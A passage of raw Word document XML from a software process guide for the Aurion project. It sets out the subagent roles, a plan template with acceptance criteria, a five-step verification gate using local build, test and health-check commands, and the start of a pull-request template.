              <w:t>Pytest / Swift Testing cases that verify each AC.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2448"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>@compliance-checker</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>After every module touch</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Scans for PHI in logs/errors/responses; descriptive-mode violations.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2448"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F7F8FA"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>@schema-validator</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F7F8FA"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>On JSON / Pydantic touches</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F7F8FA"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Verifies template + AppConfig schemas.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2448"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>@provider-evaluator</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Manual only</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Phase 2 model comparison; not in pilot path.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="360" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="2E5FA3"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>8. Acceptance criteria + the verification gate</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Plan template</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEF2"/>
        </w:rPr>
        <w:t>/plan-task</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> produces a plan with this exact structure. If acceptance criteria are missing, the loop refuses to advance and posts to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEF2"/>
        </w:rPr>
        <w:t>alerts.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>.</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Task</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{task-id} — {one-line description}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>## Why</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{Business/pilot driver. Quote CLAUDE.md section or backlog ID.}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>## Approach</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{Architectural sketch. Files to touch. Subagent assignments.}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>## Acceptance criteria</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>- [ ] AC-1: {behavior}, verified by {test name | curl command}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>- [ ] AC-2: ...</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>- [ ] AC-3: ...</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>## Out of scope</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{What this PR explicitly does NOT do.}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>## Test plan (executable)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>1. `cd backend &amp;&amp; python3 -m pytest tests/unit/test_xxx.py -v`</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>2. `curl -s localhost:8080/api/v1/...` should return ...</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>3. `xcodebuild -scheme Aurion -destination '...' build`</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>## Security implications</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{Touches PHI? Audit log? Secrets? AI prompts? Consent gate?}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The plan is committed as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEF2"/>
        </w:rPr>
        <w:t>docs: plan for {task-id}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — the first commit on the feature branch. Reviewers see what was committed to before any code.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>The verification gate</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEF2"/>
        </w:rPr>
        <w:t>/verify-acceptance</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> runs between </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEF2"/>
        </w:rPr>
        <w:t>/implement</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEF2"/>
        </w:rPr>
        <w:t>/open-pr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. It walks the AC checklist and proves each one. The loop CANNOT reach </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEF2"/>
        </w:rPr>
        <w:t>/open-pr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> until all five sub-checks pass:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Backend builds + tests pass</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>docker compose build &amp;&amp; pytest -q</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>iOS builds for both targets</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — xcodebuild succeeds on iPhone 17 AND iPad Pro 11" (M4)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Stack boots</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>docker compose up -d &amp;&amp; curl -fs localhost:8080/health</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> returns 200 within 10 s</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Every AC verified</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — each command from the plan returns the expected result</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>`/simplify` produces no Priority-1 findings</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — three review agents in parallel</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
        <w:ind w:left="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Why this matters:  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Step 3 is the 'working version of the app' enforcement. Step 4 is the acceptance-criteria enforcement. Failures loop back to /implement with the failure output as context. Max 3 fix attempts before flagging to alerts.md and skipping to the next task.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="360" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="2E5FA3"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>9. Pull request template</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEF2"/>
        </w:rPr>
        <w:t>.claude/skills/open-pr/templates/pr-body.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>. The driver fills placeholders from the plan, the diff, and the test output.</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Summary</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{1-2 sentences. What this PR delivers, who benefits.}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>## What changed</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>- Backend: {bullets by module}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>- iOS: {bullets by view/manager}</w:t>
